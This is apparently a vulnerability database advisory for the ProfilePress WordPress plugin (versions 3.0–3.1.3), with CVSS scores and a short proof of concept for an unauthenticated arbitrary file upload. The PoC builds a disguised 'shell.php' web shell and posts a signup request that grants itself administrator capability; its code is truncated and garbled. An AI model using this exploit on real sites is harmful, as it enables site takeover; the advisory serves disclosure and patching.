Lucene search

K
wpvulndbChloe ChamberlandWPVDB-ID:E12448EC-84A0-46AA-B280-5D9A80EE1E41
HistoryJun 28, 2021 - 12:00 a.m.

ProfilePress 3.0 - 3.1.3 - Arbitrary File Upload in File Uploader Component

2021-06-2800:00:00
Chloe Chamberland
wpscan.com
80

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

There is functionality in the plugin to add file uploads to user registrations and profile updates that had no file type checking in place making it possible for arbitrary files to be uploaded.

PoC

fh = open(‘shell.php’, ‘wb’) fh.write(b’\xFF\xD8\xFF\xE0’ + b’') fh.close ‘Hax0r’, ‘reg_email’ => ‘[email protected]’, ‘reg_password’ => ‘password’, ‘reg_password_present’ => ‘true’, ‘reg_first_name’ => ‘Hax0r’, ‘reg_last_name’ => ‘hack’, ‘wp_capabilities[administrator]’ => ‘1’, ‘action’ => ‘pp_ajax_signup’, ‘melange_id’ => ‘’, ‘files’ => $cFile, ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>

CPENameOperatorVersion
wp-user-avatarlt3.1.4

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

Related for WPVDB-ID:E12448EC-84A0-46AA-B280-5D9A80EE1E41